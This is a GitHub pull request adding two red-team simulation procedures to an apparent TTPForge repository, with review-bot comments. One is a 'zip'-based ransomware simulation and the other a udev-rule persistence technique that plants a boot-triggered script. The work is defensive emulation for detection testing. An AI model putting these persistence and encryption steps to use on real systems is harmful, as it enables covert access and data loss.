Impact and persistence TTPs #129
Closed
@@ -0,0 +1,51 @@ | ||
# LOTL Ransomware Encryption | ||
|
||
![Meta TTP](https://img.shields.io/badge/Meta_TTP-red) | ||
|
||
This TTP leverages the `zip` command available on Linux systems to encrypt files in a specified directory, simulating a ransomware attack using tools already present on the machine. The command encrypts the contents of the target directory and requires a password for decryption, illustrating a data encryption impact scenario often used by threat actors. | ||
|
||
## Arguments | ||
|
||
- **target_dir**: The directory to encrypt. | ||
|
||
Default: /dev/shm | ||
|
||
- **encryption_key**: The password used to encrypt the directory. | ||
|
||
Default: password | ||
|
||
## Requirements | ||
|
||
1. Access to a Linux system where the `zip` and `unzip` commands are available. | ||
2. Permission to modify files within the target directory. | ||
|
||
## Examples | ||
|
||
You can run the TTP using the following command (adjust arguments as needed): | ||
|
||
```bash | ||
ttpforge run forgearmory//impact/data-encrypt/LOTL-ransomware/LOTL-ransomware.yaml \ | ||
--arg target_dir="/path/to/target/dir" \ | ||
--arg encryption_key="your_encryption_key" | ||
``` | ||
|
||
## Steps | ||
|
||
1. **encrypt_dir**: Encrypts the specified directory using the provided encryption key. The directory is compressed into a zip file, which is encrypted with the password. | ||
|
||
```bash | ||
zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} | ||
``` | ||
|
||
1. **cleanup**: Attempts to restore the original state by decrypting and unzipping the encrypted directory. | ||
|
||
```bash | ||
unzip -P {{ .Args.encryption_key }} ttpforge.zip | ||
``` | ||
|
||
## MITRE ATT&CK Mapping | ||
|
||
- **Tactics**: | ||
- TA0040 Impact | ||
- **Techniques**: | ||
- T1486 Data Encrypted for Impact |
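Review bot: the `zip -r -P ... ttpforge.zip {{ .Args.target_dir }}` step under **Steps** never removes or overwrites the originals, so the target directory is left untouched and only a password-protected copy named `ttpforge.zip` appears in the current working directory; the description's claim that it "encrypts the contents of the target directory" overstates what actually runs, and the README should say the originals remain (or the step should delete them after a successful `zip` if the impact simulation is meant to be faithful). The cleanup `unzip -P ... ttpforge.zip` extracts relative to the working directory (zip strips the leading `/`, so `/dev/shm` comes back as `./dev/shm/...`) rather than restoring in place, and neither step deletes `ttpforge.zip`, so an artifact survives cleanup. Quote the templated password (`-P "{{ .Args.encryption_key }}"`) so keys containing spaces or shell metacharacters do not break the command, and mention under **Requirements** that the password is visible in the process list, which is part of what makes this a useful detection exercise. The example path `forgearmory//impact/data-encrypt/LOTL-ransomware/LOTL-ransomware.yaml` also differs from the path suggested in the review comment on this PR; whichever is correct must match where the YAML lands in the tree.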
@@ -0,0 +1,34 @@ | ||
--- | ||
api_version: 2.0 | ||
uuid: 0fc4bb3a-b864-4c33-8516-9b0654324ad9 | ||
name: "LOTL Ransomware" | ||
description: | | ||
"Threat actors often need to utilize tools that are prexisting on the machine in order to perform TTPs. Often times threat actors are able to utilize something as simple as the `zip` command in order to encrypt files on a machine." | ||
|
||
args: | ||
- name: target_dir | ||
decription: The directory which we will encrypt. | ||
default: /dev/shm | ||
- name: encryption_key | ||
description: The key which we will use to encrypt the data with. | ||
default: password | ||
|
||
requirements: | ||
platforms: | ||
- os: linux | ||
|
||
mitre: | ||
tactics: | ||
- "TA0040 Impact" | ||
techniques: | ||
- "T1486 Data Encrypted for Impact" | ||
|
||
steps: | ||
- name: encrypt_dir | ||
description: Encrypt provided directory | ||
inline: | | ||
zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} | ||
|
||
cleanup: | ||
inline: | | ||
unzip -P {{ .Args.encryption_key }} ttpforge.zip | ||
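Review bot: `decription:` under the `target_dir` arg is misspelled, so that argument carries no description (and a strict schema would reject the unknown key); it should be `description:` as on `encryption_key`. The `description: |` block scalar keeps the surrounding double quotes as part of the string, so drop either the quotes or the `|`. As in the README, the `encrypt_dir` step leaves the originals in place, and the cleanup `unzip -P ... ttpforge.zip` extracts a copy relative to the working directory and never removes `ttpforge.zip`; the cleanup should at least delete the archive, and if the step is changed to remove originals it should restore them to `{{ .Args.target_dir }}` rather than to `./`. Quoting the templated values in both `inline:` commands would also avoid breakage on keys with spaces.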
gerbsec marked this conversation as resolved.
@@ -0,0 +1,58 @@ | ||
# UDEV Persistence Technique | ||
|
||
![Meta TTP](https://img.shields.io/badge/Meta_TTP-red) | ||
|
||
This TTP utilizes a method of establishing persistence by creating a script that is automatically executed at boot time when the `/dev/random` device is loaded. It leverages udev rules to execute the script, making this an effective technique for maintaining access during system initialization. | ||
|
||
## Arguments | ||
|
||
- **target_path**: The path where the script and udev rule will be created. | ||
|
||
Default: /dev | ||
|
||
## Requirements | ||
|
||
1. Access to a Linux system with permissions to modify udev rules. | ||
1. Ability to write files in critical system directories. | ||
|
||
## Examples | ||
|
||
You can run the TTP using the following command (adjust arguments as needed): | ||
|
||
```bash | ||
ttpforge run forgearmory//persistence/unix/udev-persistence/udev-persistence.yaml \ | ||
--arg target_path="/your/custom/path" | ||
``` | ||
|
||
## Steps | ||
|
||
1. **create_persistence_script**: Creates a script in the specified path that will be executed upon system boot. | ||
|
||
```bash | ||
#!/bin/bash | ||
echo "touch /root/exploited" > {{ .Args.target_path }}/udev.sh | ||
chmod 0600 {{ .Args.target_path }}/udev.sh | ||
``` | ||
|
||
1. **add_udev_rule**: Adds a udev rule that triggers the script execution when the `/dev/random` device is loaded at boot time. | ||
|
||
```bash | ||
echo 'ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'"' > /etc/udev/rules.d/75-persistence.rules | ||
``` | ||
|
||
## Cleanup | ||
|
||
1. **remove_udev_rule**: Deletes the udev rule from the system. | ||
|
||
```bash | ||
rm /etc/udev/rules.d/75-persistence.rules | ||
``` | ||
|
||
## MITRE ATT&CK Mapping | ||
|
||
- **Tactics**: | ||
- TA0003 Persistence | ||
- **Techniques**: | ||
- T1546 Event Triggered Execution | ||
- **Subtechniques**: | ||
- T1546.004 Unix Shell Configuration Modification |
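Review bot: the default `target_path` of `/dev` defeats the stated goal of surviving reboot: on systemd-based systems `/dev` is a devtmpfs mount recreated empty at every boot, so `{{ .Args.target_path }}/udev.sh` will not exist when the `ACTION=="add"` rule for `/dev/random` (major 1, minor 8) fires during early boot; pick a persistent default such as a directory under `/usr/lib` or `/etc` and say so under **Arguments**. Two further problems in **Steps**: `chmod 0600` leaves the script without the execute bit, yet the rule runs it as `/bin/sh -c '.../udev.sh'`, which execs the file and fails with permission denied; use `RUN+="/bin/sh <path>/udev.sh"` or an executable mode. The `echo '...'` in **add_udev_rule** nests single quotes inside a single-quoted string, so the shell closes and reopens the quoting and the written rule reads `RUN+="/bin/sh -c <path>/udev.sh"` without the inner quotes, which is not what the YAML's `create_file` writes; and the `#!/bin/bash` line shown in **create_persistence_script** is the step's interpreter, not part of the one-line script, so it should not be shown as if it were written to disk. **Cleanup** removes only the rule; the script and the `/root/exploited` marker are left behind, and the text should note that the rule only takes effect after udev is reloaded and triggered (`udevadm control --reload` and `udevadm trigger`) or the system reboots. Finally, T1546.004 covers shell startup files such as `.bashrc` and `/etc/profile`, which this TTP never touches; map to the parent T1546 unless the ATT&CK version in use has a udev-specific sub-technique.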
38 changes: 38 additions & 0 deletions
ttps/persistence/linux/udev-persistence/udev-persistence.yaml
@@ -0,0 +1,38 @@ | ||
--- | ||
api_version: 2.0 | ||
uuid: 96c74a6e-ecec-4559-846e-8027e1612a33 | ||
name: "UDEV Persistence Technique" | ||
description: | | ||
"This technique creates a script that is executed when the /dev/random device is loaded, which is typically at boot time. This method uses udev rules to achieve persistence by triggering the script execution during system initialization, establishing a low-level method for maintaining access." | ||
|
||
args: | ||
- name: target_path | ||
description: The path where the script and udev rule will be created. | ||
default: /dev | ||
|
||
requirements: | ||
platforms: | ||
- os: linux | ||
|
||
mitre: | ||
tactics: | ||
- "TA0003 Persistence" | ||
techniques: | ||
- "T1546 Event Triggered Execution" | ||
subtechniques: | ||
- "T1546.004 Event Triggered Execution: Unix Shell Configuration Modification" | ||
steps: | ||
- name: create_persistence_script | ||
decription: Create the script that will be executed at boot. | ||
create_file: {{ .Args.target_path }}/udev.sh | ||
contents: | ||
touch /root/exploited | ||
mode: 0600 | ||
cleanup: default | ||
|
||
- name: add_udev_rule | ||
description: Add a udev rule to trigger the script at boot when /dev/random is loaded. | ||
create_file: "/etc/udev/rules.d/75-persistence.rules" | ||
contents: ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'" | ||
cleanup: | ||
remove_path: "/etc/udev/rules.d/75-persistence.rules" |
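Review bot: `decription:` on the `create_persistence_script` step is misspelled and will be ignored or rejected; it should be `description:`. `create_file: {{ .Args.target_path }}/udev.sh` is unquoted and relies on templates being rendered before the YAML is parsed, since `{{` otherwise opens a flow mapping; quote it as the second `create_file` is. The substantive problems match the README: `mode: 0600` combined with `RUN+="/bin/sh -c '<path>/udev.sh'"` fails on execute permission (use `mode: 0700` or `RUN+="/bin/sh <path>/udev.sh"`), and the `/dev` default is devtmpfs, so the script written there no longer exists at the next boot when the `ACTION=="add"` rule for major 1 minor 8 fires. Nothing in either `cleanup` removes `/root/exploited`, so the marker left by a successful run persists after the TTP reports clean.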
Looks like the directory to execute should be
forgearmory//impact/ltol-ransomware/lotl-ransomware.yaml
Done